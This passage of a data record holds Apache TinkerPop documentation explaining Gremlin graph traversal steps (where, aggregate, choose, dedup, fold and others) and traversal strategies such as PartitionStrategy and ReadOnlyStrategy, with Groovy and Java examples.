vertices.\n\n[[where-step]]\nWhere Step\n~~~~~~~~~~\n\nThe `where()`-step filters the current object based on either the object itself (`Scope.local`) or the path history of the object (`Scope.global`) (*filter*). This step is typically used in conjuction with either <<match-step,`match()`>>-step or <<select-step,`select()`>>-step, but can be used in isolation.\n\n[gremlin-groovy,modern]\n----\ng.V(1).as('a').out('created').in('created').where(neq('a')) <1>\ng.withSideEffect('a'){['josh','peter']}.V(1).out('created').in('created').values('name').where(within('a')) <2>\ng.V(1).out('created').in('created').where(out('created').count().is(gt(1))).values('name') <3>\n----\n\n<1> Who are marko's collaborators, where marko can not be his own collaborator? (predicate)\n<2> Of the co-creators of marko, only keep those whose name is josh or peter. (using a sideEffect)\n<3> Which of marko's collaborators have worked on more than 1 project? (using a traversal)\n\nIMPORTANT: Please see <<using-where-with-match,`match().where()`>> and <<using-where-with-select,`select().where()`>> for how `where()` can be used in conjunction with `Map<String,Object>` projecting steps -- i.e. `Scope.local`.\n\n[[a-note-on-barrier-steps]]\nA Note on Barrier Steps\n-----------------------\n\nimage:barrier.png[width=165,float=right] Gremlin is primarily a link:http:\/\/en.wikipedia.org\/wiki\/Lazy_evaluation[lazy], stream processing language. This means that Gremlin fully processes (to the best of its abilities) any traversers currently in the traversal pipeline before getting more data from the start\/head of the traversal. However, there are numerous situations in which a completely lazy computation is not possible (or impractical). When a computation is not lazy, a \"barrier step\" exists. There are three types of barriers:\n\n . `CollectingBarrierStep`: All of the traversers prior to the step are put into a collection and then processed in some way (e.g. ordered) prior to the collection being \"drained\" one-by-one to the next step. Examples include: <<order-step,`order()`>>, <<sample-step,`sample()`>>, <<aggregate-step,`aggregate()`>>.\n . `ReducingBarrierStep`: All of the traversers prior to the step are processed by a reduce function and once all the previous traversers are processed, a single \"reduced value\" traverser is emitted to the next step. Examples include: <<fold-step,`fold()`>>, <<count-step,`count()`>>, <<sum-step,`sum()`>>, <<max-step,`max()`>>, <<min-step,`min()`>>.\n . `SupplyingBarrierStep`: All of the traversers prior to the step are iterated (no processing) and then some provided supplier yields a single traverser to continue to the next step. Examples include: <<cap-step,`cap()`>>.\n\nIn Gremlin OLAP (see <<traversalvertexprogram,`TraversalVertexProgram`>>), a barrier is introduced at the end of every <<vertex-steps,adjacent vertex step>>. This means that the traversal does its best to compute as much as possible at the current, local vertex. What is can't compute without referencing an adjacent vertex is aggregated into a barrier collection. When there are no more traversers at the local vertex, the barriered traversers are the messages that are propagated to remote vertices for further processing.\n\n[[a-note-on-lambdas]]\nA Note On Lambdas\n-----------------\n\nimage:lambda.png[width=150,float=right] A link:http:\/\/en.wikipedia.org\/wiki\/Anonymous_function[lambda] is a function that can be referenced by software and thus, passed around like any other piece of data. In Gremlin, lambdas make it possible to generalize the behavior of a step such that custom steps can be created (on-the-fly) by the user. However, it is advised to avoid using lambdas if possible.\n\n[gremlin-groovy,modern]\n----\ng.V().filter{it.get().value('name') == 'marko'}.\n flatMap{it.get().vertices(OUT,'created')}.\n map {it.get().value('name')} <1>\ng.V().has('name','marko').out('created').values('name') <2>\n----\n\n<1> A lambda-rich Gremlin traversal which should and can be avoided. (*bad*)\n<2> The same traversal (result), but without using lambdas. (*good*)\n\nGremlin attempts to provide the user a comprehensive collection of steps in the hopes that the user will never need to leverage a lambda in practice. It is advised that users only leverage a lambda if and only if there is no corresponding lambda-less step that encompasses the desired functionality. The reason being, lambdas can not be optimized by Gremlin's compiler strategies as they can not be programmatically inspected (see <<traversalstrategy,traversal strategies>>).\n\nIn many situations where a lambda could be used, either a corresponding step exists or a traversal can be provided in its place. A `TraversalLambda` behaves like a typical lambda, but it can be optimized and it yields less objects than the corresponding pure-lambda form.\n\n[gremlin-groovy,modern]\n----\ng.V().out().out().path().by {it.value('name')}.\n by {it.value('name')}.\n by {g.V(it).in('created').values('name').fold().next()} <1>\ng.V().out().out().path().by('name').\n by('name').\n by(__.in('created').values('name').fold()) <2>\n----\n\n<1> The length-3 paths have each of their objects transformed by a lambda. (*bad*)\n<2> The length-3 paths have their objects transformed by a lambda-less step and a traversal lambda. (*good*)\n\n[[traversalstrategy]]\nTraversalStrategy\n-----------------\n\nimage:traversal-strategy.png[width=125,float=right] A `TraversalStrategy` can analyze a `Traversal` and mutate the traversal as it deems fit. This is useful in multiple situations:\n\n * There is an application-level feature that can be embedded into the traversal logic (*decoration*).\n * There is a more efficient way to express the traversal at the TinkerPop3 level (*optimization*).\n * There is a more efficient way to express the traversal at the graph vendor level (*vendor optimization*).\n * There are are some final adjustments required before executing the traversal (*finalization*).\n * There are certain traversals that are not legal for the application or traversal engine (*verification*).\n\nA simple `OptimizationStrategy` is the `IdentityRemovalStrategy`.\n\n[source,java]\n----\npublic class IdentityRemovalStrategy extends AbstractTraversalStrategy<TraversalStrategy.OptimizationStrategy> implements TraversalStrategy.OptimizationStrategy {\n\n private static final IdentityRemovalStrategy INSTANCE = new IdentityRemovalStrategy();\n\n private IdentityRemovalStrategy() {\n }\n\n @Override\n public void apply(final Traversal.Admin<?, ?> traversal) {\n if (!TraversalHelper.hasStepOfClass(IdentityStep.class, traversal))\n return;\n TraversalHelper.getStepsOfClass(IdentityStep.class, traversal).stream()\n .filter(step -> !TraversalHelper.isLabeled(step))\n .forEach(step -> traversal.removeStep(step));\n }\n\n public static IdentityRemovalStrategy instance() {\n return INSTANCE;\n }\n}\n----\n\nThis strategy simply removes any unlabeled `IdentityStep` steps in the Traversal as `aStep().identity().identity().bStep()` is equivalent to `aStep().bStep()`. For those traversal strategies that require other strategies to execute prior or post to the strategy, then the following two methods can be defined in `TraversalStrategy` (with defaults being an empty set). If the `TraversalStrategy` is in a particular traversal category (i.e. decoration, optimization, finalization, or verification), then priors and posts are only possible within the category.\n\n[source,java]\npublic Set<Class<? extends S>> applyPrior();\npublic Set<Class<? extends S>> applyPost();\n\nIMPORTANT: `TraversalStrategy` categories are sorted within their category and the categories are then executed in the following order: decoration, optimization, finalization, and verification. If a designed strategy does not fit cleanly into these categories, then it can implement `TraversalStrategy` and its prior and posts can reference strategies within any category.\n\nAn example of a `VendorOptimizationStrategy` is provided below.\n\n[source,groovy]\ng.V().has('name','marko')\n\nThe expression above can be executed in a `O(|V|)` or `O(log(|V|)` fashion in <<tinkergraph-gremlin,TinkerGraph>> depending on whether there is or is not an index defined for \"name.\"\n\n[source,java]\n----\npublic final class TinkerGraphStepStrategy extends AbstractTraversalStrategy<TraversalStrategy.VendorOptimizationStrategy> implements TraversalStrategy.VendorOptimizationStrategy {\n\n private static final TinkerGraphStepStrategy INSTANCE = new TinkerGraphStepStrategy();\n\n private TinkerGraphStepStrategy() {\n }\n\n @Override\n public void apply(final Traversal.Admin<?, ?> traversal) {\n if (traversal.getEngine().isComputer())\n return;\n\n final Step<?, ?> startStep = traversal.getStartStep();\n if (startStep instanceof GraphStep) {\n final GraphStep<?> originalGraphStep = (GraphStep) startStep;\n final TinkerGraphStep<?> tinkerGraphStep = new TinkerGraphStep<>(originalGraphStep);\n TraversalHelper.replaceStep(startStep, (Step) tinkerGraphStep, traversal);\n\n Step<?, ?> currentStep = tinkerGraphStep.getNextStep();\n while (true) {\n if (currentStep instanceof HasContainerHolder) {\n tinkerGraphStep.hasContainers.addAll(((HasContainerHolder) currentStep).getHasContainers());\n currentStep.getLabels().forEach(tinkerGraphStep::addLabel);\n traversal.removeStep(currentStep);\n } else {\n break;\n }\n currentStep = currentStep.getNextStep();\n }\n }\n }\n\n public static TinkerGraphStepStrategy instance() {\n return INSTANCE;\n }\n}\n----\n\nThe traversal is redefined by simply taking a chain of `has()`-steps after `g.V()` (`TinkerGraphStep`) and providing them to `TinkerGraphStep`. Then its up to TinkerGraphStep to determine if an appropriate index exists. In the code below, review the `vertices()` method and note how if an index exists, for a particular `HasContainer`, then that index is first queried before the remaining `HasContainer` filters are serially applied. Given that the strategy uses non-TinkerPop3 provided steps, it should go into the `VendorOptimizationStrategy` category to ensure the added step does not corrupt the `OptimizationStrategy` strategies.\n\n[gremlin-groovy,modern]\n----\nt = g.V().has('name','marko'); null\nt.toString()\nt.iterate(); null\nt.toString()\n----\n\nA collection of useful `DecorationStrategy` strategies are provided with TinkerPop3 and are generally useful to end-users. The following sub-sections detail these strategies:\n\nElementIdStrategy\n~~~~~~~~~~~~~~~~~\n\n`ElementIdStrategy` provides control over element identifiers. Some Graph implementations, such as TinkerGraph, allow specification of custom identifiers when creating elements:\n\n[gremlin-groovy]\n----\ng = TinkerGraph.open().traversal()\nv = g.addV(id,'42a')\ng.V('42a')\n----\n\nOther `Graph` implementations, such as Neo4j, generate element identifiers automatically and cannot be assigned. As a helper, `ElementIdStrategy` can be used to make identifier assignment possible by using vertex and edge indicies under the hood.\n\n[source,groovy]\n----\ngremlin> graph = Neo4jGraph.open('\/tmp\/neo4j')\n==>neo4jgraph[EmbeddedGraphDatabase [\/tmp\/neo4j]]\ngremlin> strategy = ElementIdStrategy.build().create()\n==>ElementIdStrategy\ngremlin> g = GraphTraversalSource.build().with(strategy).create(graph)\n==>graphtraversalsource[neo4jgraph[EmbeddedGraphDatabase [\/tmp\/neo4j]], standard]\ngremlin> g.addV(id, '42a').id()\n==>42a\n----\n\nIMPORTANT: The key that is used to store the assigned identifier should be indexed in the underlying graph database. If it is not indexed, then lookups for the elements that use these identifiers will perform a linear scan.\n\nEventStrategy\n~~~~~~~~~~~~~\n\nThe purpose of the `EventStrategy` is to raise events to one or more `MutationListener` objects as changes to the underlying `Graph` occur within a `Traversal`. Such a strategy is useful for logging changes, triggering certain actions based on change, or any application that needs notification of some mutating operation during a `Traversal`. Graphs that do not support transactions will generate events immediately upon mutation, while those graphs that support transactions will queue the mutations until that transaction is committed and will then raise the events. If the transaction is rolled back, the event queue is reset.\n\nThe following events are raised to the `MutationListener`:\n\n* New vertex\n* New edge\n* Vertex property changed\n* Edge property changed\n* Vertex property removed\n* Edge property removed\n* Vertex removed\n* Edge removed\n\nTo start processing events from a `Traversal` first implement the `MutationListener` interface. An example of this implementation is the `ConsoleMutationListener` which writes output to the console for each event. The following console session displays the basic usage:\n\n[gremlin-groovy]\n----\ngraph = TinkerFactory.createModern()\nl = new ConsoleMutationListener(graph)\nstrategy = EventStrategy.build().addListener(l).create()\ng = GraphTraversalSource.build().with(strategy).create(graph)\ng.addV('name','stephen')\ng.E().drop()\n----\n\nThe example above uses TinkerGraph which does not support transactions. As mentioned previously, for these types of graph implementations events are raised as they occur within execution of a `Step`. As such, the final line of Gremlin execution that drops all edges shows a bit of an inconsistent count, where the removed edge count is accounted for after the event is raised.\n\nCAUTION: `EventStrategy` is not meant for usage in tracking global mutations across separate processes. In other words, an mutation in what JVM process is not raised as an event in a different JVM process. In addition, events are not raised when mutations occur outside of the `Traversal` context.\n\nPartitionStrategy\n~~~~~~~~~~~~~~~~~\n\nimage::partition-graph.png[width=325]\n\n`PartitionStrategy` partitions the vertices and edges of a graph into `String` named partitions (i.e. buckets, subgraphs, etc.). The idea behind `PartitionStrategy` is presented in the image above where each element is in a single partition (represented by its color). Partitions can be read from, written to, and linked\/joined by edges that span one or two partitions (e.g. a tail vertex in one partition and a head vertex in another).\n\nThere are three primary variables in `PartitionStrategy`:\n\n. Partition Key - The property key that denotes a String value representing a partition.\n. Write Partition - A `String` denoting what partition all future written elements will be in.\n. Read Partitions - A `Set<String>` of partitions that can be read from.\n\nThe best way to understand `PartitionStrategy` is via example.\n\n[gremlin-groovy]\n----\ngraph = TinkerFactory.createModern()\nstrategyA = PartitionStrategy.build().partitionKey(\"_partition\").writePartition(\"a\").addReadPartition(\"a\").create()\nstrategyB = PartitionStrategy.build().partitionKey(\"_partition\").writePartition(\"b\").addReadPartition(\"b\").create()\ngA = GraphTraversalSource.build().with(strategyA).create(graph)\ngA.addV() \/\/ this vertex has a property of {_partition:\"a\"}\ngB = GraphTraversalSource.build().with(strategyB).create(graph)\ngB.addV() \/\/ this vertex has a property of {_partition:\"b\"}\ngA.V()\ngB.V()\n----\n\nBy writing elements to particular partitions and then restricting read partitions, the developer is able to create multiple graphs within a single address space. Moreover, by supporting references between partitions, it is possible to merge those multiple graphs (i.e. join partitions).\n\nReadOnlyStrategy\n~~~~~~~~~~~~~~~~\n\n`ReadOnlyStrategy` is largely self-explanatory. A `Traversal` that has this strategy applied will throw an `IllegalStateException` if the `Traversal` has any mutating steps within it.\n\nSubgraphStrategy\n~~~~~~~~~~~~~~~~\n\n`SubgraphStrategy` is quite similar to `PartitionStrategy` in that it restrains a `Traversal` to certain vertices and edges as determined by a `Predicate` defined individually for each.\n\n[gremlin-groovy]\n----\ngraph = TinkerFactory.createModern()\nvertexCriterion = { vertex -> true }\nedgeCriterion = { edge -> edge.id() >= 8 && edge.id() <= 10}\nstrategy = SubgraphStrategy.build().vertexPredicate(vertexCriterion).edgePredicate(edgeCriterion).create()\ng = GraphTraversalSource.build().with(strategy).create(graph)\ng.V() \/\/ shows all vertices as they all pass the vertexCriterion\ng.E() \/\/ shows only the edges defined in the edgeCriterion\n----\n\nNote that `SubgraphStrategy` directly passes the edge and vertex criterion `Predicate` objects to an injected `filter` step and as such may not take advantage of important optimizations provided by the various `Graph` implementations (given the use of lambda expressions).\n","old_contents":"\/\/\/\/\nLicensed to the Apache Software Foundation (ASF) under one or more\ncontributor license agreements. See the NOTICE file distributed with\nthis work for additional information regarding copyright ownership.\nThe ASF licenses this file to You under the Apache License, Version 2.0\n(the \"License\"); you may not use this file except in compliance with\nthe License. You may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\/\/\/\/\n[[traversal]]\nThe Traversal\n=============\n\nimage::gremlin-running.png[width=125]\n\nAt the most general level there is `Traversal<S,E>` which implements `Iterator<E>`, where the `S` stands for start and the `E` stands for end. A traversal is composed of four primary components:\n \n . `Step<S,E>`: an individual function applied to `S` to yield `E`. Steps are chained within a traversal.\n . `TraversalStrategy`: interceptor methods to alter the execution of the traversal (e.g. query re-writing).\n . `TraversalSideEffects`: key\/value pairs that can be used to store global information about the traversal.\n . `Traverser<T>`: the object propagating through the `Traversal` currently representing an object of type `T`. \n\nThe classic notion of a graph traversal is provided by `GraphTraversal<S,E>` which extends `Traversal<S,E>`. GraphTraversal provides an interpretation of the graph data in terms of vertices, edges, etc. and thus, a graph traversal link:http:\/\/en.wikipedia.org\/wiki\/Domain-specific_language[DSL].\n\nIMPORTANT: The underlying `Step` implementations provided by TinkerPop should encompass most of the functionality required by a DSL author. It is important that DSL authors leverage the provided steps as then the common optimization and decoration strategies can reason on the underlying traversal sequence. If new steps are introduced, then common traversal strategies may not function properly.\n\n[[graph-traversal-steps]]\nGraph Traversal Steps\n---------------------\n\nimage::step-types.png[width=650]\n\nA `GraphTraversal<S,E>` can be spawned off of a Graph, Vertex, Edge, or VertexProperty. It can also be spawned anonymously (i.e. empty) via `__`. A graph traversal is composed of an ordered list of steps. All the steps provided by `GraphTraversal` inherit from the more general forms diagrammed above. A list of all the steps (and their descriptions) are provided in the TinkerPop3 link:http:\/\/www.tinkerpop.com\/javadocs\/x.y.z\/core\/org\/apache\/tinkerpop\/gremlin\/process\/graph\/GraphTraversal.html[GraphTraversal JavaDoc]. The following subsections will demonstrate the GraphTraversal steps using the <<gremlin-console,Gremlin Console>>.\n\nNOTE: To reduce the verbosity of the expression, it is good to `import static org.apache.tinkerpop.gremlin.process.traversal.dsl.graph.__.*`. This way, instead of doing `__.inE()` for an anonymous traversal, it is possible to simply write `inE()`.\n\n[[lambda-steps]]\nLambda Steps\n~~~~~~~~~~~~\n\nCAUTION: Lambda steps are presented for educational purposes as they represent the foundational constructs of the Gremlin language. In practice, lambda steps should be avoided and traversal verification strategies exist to disallow their use unless explicitly \"turned off.\" For more information on the problems with lambdas, please read <<a-note-on-lambdas,A Note on Lambdas>>.\n\nThere are four generic steps by which all other specific steps described later extend.\n\n[width=\"100%\",cols=\"10,12\",options=\"header\"]\n|=========================================================\n| Step| Description\n| `map(Function<Traverser<S>, E>)` | map the traverser to some object of type `E` for the next step to process.\n| `flatMap(Function<Traverser<S>, Iterator<E>>)` | map the traverser to an iterator of `E` objects that are streamed to the next step.\n| `filter(Predicate<Traverser<S>>)` | map the traverser to either true or false, where false will not pass the traverser to the next step.\n| `sideEffect(Consumer<Traverser<S>>)` | perform some operation on the traverser and pass it to the next step.\n| `branch(Function<Traverser<S>,M>)` | split the traverser to all the traversals indexed by the `M` token.\n|=========================================================\n\nThe `Traverser<S>` object provides access to:\n\n . The current traversed `S` object -- `Traverser.get()`.\n . The current path traversed by the traverser -- `Traverser.path()`.\n .. A helper shorthand to get a particular path-history object -- `Traverser.path(String) == Traverser.path().get(String)`.\n . The number of times the traverser has gone through the current loop -- `Traverser.loops()`.\n . The number of objects represented by this traverser -- `Traverser.bulk()`.\n . The local data structure associated with this traverser -- `Traverser.sack()`.\n . The side-effects associated with the traversal -- `Traverser.sideEffects()`.\n .. A helper shorthand to get a particular side-effect -- `Traverser.sideEffect(String) == Traverser.sideEffects().get(String)`.\n\nimage:map-lambda.png[width=150,float=right]\n[gremlin-groovy,modern]\n----\ng.V(1).out().values('name') <1>\ng.V(1).out().map {it.get().value('name')} <2>\n----\n\n<1> An outgoing traversal from vertex 1 to the name values of the adjacent vertices.\n<2> The same operation, but using a lambda to access the name property values.\n\nimage:filter-lambda.png[width=160,float=right]\n[gremlin-groovy,modern]\n----\ng.V().filter {it.get().label() == 'person'} <1>\ng.V().hasLabel('person') <2>\n----\n\n<1> A filter that only allows the vertex to pass if it has an age-property.\n<2> The more specific `has()`-step is implemented as a `filter()` with respective predicate.\n\n\nimage:side-effect-lambda.png[width=175,float=right]\n[gremlin-groovy,modern]\n----\ng.V().hasLabel('person').sideEffect(System.out.&println) <1>\n----\n\n<1> Whatever enters `sideEffect()` is passed to the next step, but some intervening process can occur.\n\nimage:branch-lambda.png[width=180,float=right]\n[gremlin-groovy,modern]\n----\ng.V().branch(values('name')).\n option('marko', values('age')).\n option(none, values('name')) <1>\ng.V().choose(has('name','marko'),\n values('age'),\n values('name')) <2>\n----\n\n<1> If the vertex is \"marko\", get his age, else get the name of the vertex.\n<2> The more specific boolean-based `choose()`-step is implemented as a `branch()`.\n\n[[addedge-step]]\nAddEdge Step\n~~~~~~~~~~~~\n\nIt is possible to mutate the graph within a traversal. The typical mutations are adding\/removing vertices, edges, and properties. To add edges, there are a collection of `addE()`-steps (*map*\/*sideEffect*).\n\n[gremlin-groovy,modern]\n----\ng.V(1).addOutE('co-worker',g.V(2),'year',2009) <1>\ng.V(4).addInE('createdBy',g.V(3,5)) <2>\ng.V(1).addOutE('livesNear',g.V(2),'year',2009).inV().inE('livesNear').values('year') <3>\ng.V(1).out('livesNear')\n----\n\n<1> Add an outgoing co-worker edge from the marko-vertex to the vadas-vertex with a year property of value 2009.\n<2> Add incoming createdBy edges from the josh-vertex to the lop- and ripple-vertices.\n<3> The newly created edge is a traversable object.\n\nimage::addedge-step.png[width=450]\n\nlink:http:\/\/en.wikipedia.org\/wiki\/Automated_reasoning[Reasoning] is the process of making explicit in the data was is implicit in the data. What is explicit in a graph are the objects of the graph -- i.e. vertices and edges. What is implicit in the graph is the traversal. In other words, traversals expose meaning where the meaning is defined by the traversal description. For example, take the concept of a \"co-developer.\" Two people are co-developers if they have worked on the same project together. This concept can be represented as a traversal and thus, the concept of \"co-developers\" can be derived.\n\n[gremlin-groovy,modern]\n----\ng.V(1).as('a').out('created')\ng.V(1).as('a').out('created').in('created')\ng.V(1).as('a').out('created').in('created').where(neq('a')) <1>\ng.V(1).as('a').out('created').in('created').where(neq('a')).\n addOutE('co-developer','a').outV().\n addInE('co-developer','a')\ng.V(1).out('co-developer').values('name')\ng.V(1).in('co-developer').values('name')\n----\n\n<1> Marko can't be a co-developer with himself.\n\n[[addvertex-step]]\nAddVertex Step\n~~~~~~~~~~~~~~\n\nThe `addV()`-step is used to add vertices to the graph (*map*\/*sideEffect*). For every incoming object, a vertex is created. Moreover, `GraphTraversalSource` maintains an `addV()` method.\n\n[gremlin-groovy,modern]\n----\ng.addV(label,'person','name','stephen')\ng.V().values('name')\ng.V().outE('knows').addV('name','nothing')\ng.V().has('name','nothing')\ng.V().has('name','nothing').bothE()\n----\n\n[[addproperty-step]]\nAddProperty Step\n~~~~~~~~~~~~~~~~\n\nThe `property()`-step is used to add properties to the elements of the graph (*sideEffect*). Unlike `addV()` and `addE()`, `property()` is a full sideEffect step in that it does not return the property it created, but the element that streamed into it.\n\n[gremlin-groovy,modern]\n----\ng.V(1).property('country','usa')\ng.V(1).property('city','santa fe').property('state','new mexico').valueMap()\ng.V(1).property(list,'age',35)\ng.V(1).valueMap()\n----\n\n[[aggregate-step]]\nAggregate Step\n~~~~~~~~~~~~~~\n\nimage::aggregate-step.png[width=800]\n\nThe `aggregate()`-step (*sideEffect*) is used to aggregate all the objects at a particular point of traversal into a Collection. The step uses link:http:\/\/en.wikipedia.org\/wiki\/Eager_evaluation[eager evaluation] in that no objects continue on until all previous objects have been fully aggregated (as opposed to <<store-step,`store()`>> which link:http:\/\/en.wikipedia.org\/wiki\/Lazy_evaluation[lazily] fills a collection). The eager evaluation nature is crucial in situations where everything at a particular point is required for future computation. An example is provided below.\n\n[gremlin-groovy,modern]\n----\ng.V(1).out('created') <1>\ng.V(1).out('created').aggregate('x') <2>\ng.V(1).out('created').aggregate('x').in('created') <3>\ng.V(1).out('created').aggregate('x').in('created').out('created') <4>\ng.V(1).out('created').aggregate('x').in('created').out('created').\n where(without('x')).values('name') <5>\n----\n\n<1> What has marko created?\n<2> Aggregate all his creations.\n<3> Who are marko's collaborators?\n<4> What have marko's collaborators created?\n<5> What have marko's collaborators created that he hasn't created?\n\nIn link:http:\/\/en.wikipedia.org\/wiki\/Recommender_system[recommendation systems], the above pattern is used:\n\t\n\t\"What has userA liked? Who else has liked those things? What have they liked that userA hasn't already liked?\"\n\nFinally, `aggregate()`-step can be modulated via `by()`-projection.\n\n[gremlin-groovy,modern]\n----\ng.V().out('knows').aggregate()\ng.V().out('knows').aggregate().by('name')\n----\n\n[[and-step]]\nAnd Step\n~~~~~~~~\n\nThe `and()`-step ensures that all provided traversals yield a result (*filter*). Please see <<or-step,`or()`>> for or-semantics.\n\n[gremlin-groovy,modern]\n----\ng.V().and(\n outE('knows'),\n values('age').is(lt(30))).\n values('name')\n----\n\nThe `and()`-step can take an arbitrary number of traversals. All traversals must produce at least one output for the original traverser to pass to the next step.\n\nAn link:http:\/\/en.wikipedia.org\/wiki\/Infix_notation[infix notation] can be used as well. Though, with infix notation, only two traversals can be and'd together.\n\n[gremlin-groovy,modern]\n----\ng.V().has(outE('created').and().outE('knows')).values('name')\n----\n\n[[as-step]]\nAs Step\n~~~~~~~\n\nThe `as()`-step is not a real step, but a \"step modulator\" similar to <<by-step,`by()`>> and <<option-step,`option()`>>. With `as()`, it is possible to provide a label to the step that can later be accessed by steps and data structures that make use of such labels -- e.g., <<select-step,`select()`>>, <<match-step,`match()`>>, and path.\n\n[gremlin-groovy,modern]\n----\ng.V().as('a').out('created').as('b').select() <1>\ng.V().as('a').out('created').as('b').select().by('name') <2>\n----\n\n<1> Select the objects labeled \"a\" and \"b\" from the path.\n<2> Select the objects labeled \"a\" and \"b\" from the path and, for each object, project its name value.\n\nA step can have any number of labels associated with it. This is useful for referencing the same step multiple times in a future step.\n\n[gremlin-groovy,modern]\n----\ng.V().hasLabel('software').as('a','b','c').\n select().\n by('name').\n by('lang').\n by(__.in('created').values('name').fold())\n----\n\n[[by-step]]\nBy Step\n~~~~~~~\n\nThe `by()`-step is not an actual step, but instead is a \"step-modulator\" similar to <<as-step,`as()`>> and <<option-step,`option()`>>. If a step is able to accept traversals, functions, comparators, etc. then `by()` is the means by which they are added. The general pattern is `step().by()...by()`. Some steps can only accept one `by()` while others can take an arbitrary amount.\n\n[gremlin-groovy,modern]\n----\ng.V().group().by(bothE().count()) <1>\ng.V().group().by(bothE().count()).by('name') <2>\ng.V().group().by(bothE().count()).by('name').by(count(local)) <3>\n----\n\n<1> `by(outE().count())` will group the elements by their edge count (*traversal*).\n<2> `by('name')` will process the grouped elements by their name (*element property projection*).\n<3> `by(count(local))` will count the number of elements in each group (*traversal*).\n\n[[coalesce-step]]\nCoalesce Step\n~~~~~~~~~~~~~\n\nThe `coalesce()`-step evaluates the provided traversals in order and returns the first traversal that emits at least one element.\n\n[gremlin-groovy,modern]\n----\ng.V(1).coalesce(outE('knows'), outE('created')).inV().path().by('name').by(label)\ng.V(1).coalesce(outE('created'), outE('knows')).inV().path().by('name').by(label)\ng.V(1).next().property('nickname', 'okram')\ng.V().hasLabel('person').coalesce(values('nickname'), values('name'))\n----\n\n[[count-step]]\nCount Step\n~~~~~~~~~~\n\nimage::count-step.png[width=195]\n\nThe `count()`-step (*map*) counts the total number of represented traversers in the streams (i.e. the bulk count).\n\n[gremlin-groovy,modern]\n----\ng.V().count()\ng.V().hasLabel('person').count()\ng.V().hasLabel('person').outE('created').count().path() <1>\ng.V().hasLabel('person').outE('created').count().map {it.get() * 10}.path() <2>\n----\n\n<1> `count()`-step is a <<a-note-on-barrier-steps,reducing barrier step>> meaning that all of the previous traversers are folded into a new traverser.\n<2> The path of the traverser emanating from `count()` starts at `count()`.\n\nIMPORTANT: `count(local)` counts the current, local object (not the objects in the traversal stream). This works for `Collection`- and `Map`-type objects. For any other object, a count of 1 is returned.\n\n[[choose-step]]\nChoose Step\n~~~~~~~~~~~\n\nimage::choose-step.png[width=700]\n\nThe `choose()`-step (*branch*) routes the current traverser to a particular traversal branch option. With `choose()`, it is possible to implement if\/else-based semantics as well as more complicated selections.\n\n[gremlin-groovy,modern]\n----\ng.V().hasLabel('person').\n choose(values('age').is(lte(30)),\n __.in(),\n __.out()).values('name') <1>\ng.V().hasLabel('person').\n choose(values('age')).\n option(27, __.in()).\n option(32, __.out()).values('name') <2>\n----\n\n<1> If the traversal yields an element, then do `in`, else do `out` (i.e. true\/false-based option selection).\n<2> Use the result of the traversal as a key to the map of traversal options (i.e. value-based option selection).\n\nHowever, note that `choose()` can have an arbitrary number of options and moreover, can take an anonymous traversal as its choice function.\n\n[gremlin-groovy,modern]\n----\ng.V().hasLabel('person').\n choose(values('name')).\n option('marko', values('age')).\n option('josh', values('name')).\n option('vadas', valueMap()).\n option('peter', label())\n----\n\nThe `choose()`-step can leverage the `Pick.none` option match. For anything that does not match a specified option, the `none`-option is taken.\n\n[gremlin-groovy,modern]\n----\ng.V().hasLabel('person').\n choose(values('name')).\n option('marko', values('age')).\n option(none, values('name'))\n----\n\n[[coin-step]]\nCoin Step\n~~~~~~~~~\n\nTo randomly filter out a traverser, use the `coin()`-step (*filter*). The provided double argument biases the \"coin toss.\"\n\n[gremlin-groovy,modern]\n----\ng.V().coin(0.5)\ng.V().coin(0.0)\ng.V().coin(1.0)\n----\n\n[[cyclicpath-step]]\nCyclicPath Step\n~~~~~~~~~~~~~~~\n\nimage::cyclicpath-step.png[width=400]\n\nEach traverser maintains its history through the traversal over the graph -- i.e. its <<path-data-structure,path>>. If it is important that the traverser repeat its course, then `cyclic()`-path should be used (*filter*). The step analyzes the path of the traverser thus far and if there are any repeats, the traverser is filtered out over the traversal computation. If non-cyclic behavior is desired, see <<simplepath-step,`simplePath()`>>.\n\n[gremlin-groovy,modern]\n----\ng.V(1).both().both()\ng.V(1).both().both().cyclicPath()\ng.V(1).both().both().cyclicPath().path()\n----\n\n[[dedup-step]]\nDedup Step\n~~~~~~~~~~\n\nWith `dedup()`-step (*filter*), repeatedly seen objects are removed from the traversal stream. Note that if a traverser's bulk is greater than 1, then it is set to 1 before being emitted.\n\n[gremlin-groovy,modern]\n----\ng.V().values('lang')\ng.V().values('lang').dedup()\ng.V(1).repeat(bothE('created').dedup().otherV()).emit().path() <1>\n----\n\n<1> Traverse all `created` edges, but don't touch any edge twice.\n\nIf a by-step modulation is provided to `dedup()`, then the object is processed accordingly prior to determining if it has been seen or not.\n\n[gremlin-groovy,modern]\n----\ng.V().valueMap(true, 'name')\ng.V().dedup().by(label).values('name')\n----\n\nWARNING: The `dedup()`-step does not have a correlate in <<traversalvertexprogram,Gremlin OLAP>> when used mid-traversal. When in mid-traversal de-duplication only occurs at the the current processing vertex and thus, is not a global operation as it in Gremlin OLTP. When `dedup()` is an end step, the resultant traversers are de-duplicated by `TraverserMapReduce`.\n\n[[drop-step]]\nDrop Step\n~~~~~~~~~\n\nThe `drop()`-step (*filter*\/*sideEffect*) is used to remove element and properties from the graph (i.e. remove). It is a filter step because the traversal yields no outgoing objects.\n\n[gremlin-groovy,modern]\n----\ng.V().outE().drop()\ng.E()\ng.V().properties('name').drop()\ng.V().valueMap()\ng.V().drop()\ng.V()\n----\n\n[[fold-step]]\nFold Step\n~~~~~~~~~\n\nThere are situations when the traversal stream needs a \"barrier\" to aggregate all the objects and emit a computation that is a function of the aggregate. The `fold()`-step (*map*) is one particular instance of this. Please see <<unfold-step,`unfold()`>>-step for the inverse functionality.\n\n[gremlin-groovy,modern]\n----\ng.V(1).out('knows').values('name')\ng.V(1).out('knows').values('name').fold() <1>\ng.V(1).out('knows').values('name').fold().next().getClass() <2>\ng.V(1).out('knows').values('name').fold(0) {a,b -> a + b.length()} <3>\ng.V().values('age').fold(0) {a,b -> a + b} <4>\ng.V().values('age').fold(0, sum) <5>\ng.V().values('age').sum() <6>\n----\n\n<1> A parameterless `fold()` will aggregate all the objects into a list and then emit the list.\n<2> A verification of the type of list returned.\n<3> `fold()` can be provided two arguments -- a seed value and a reduce bi-function (\"vadas\" is 5 characters + \"josh\" with 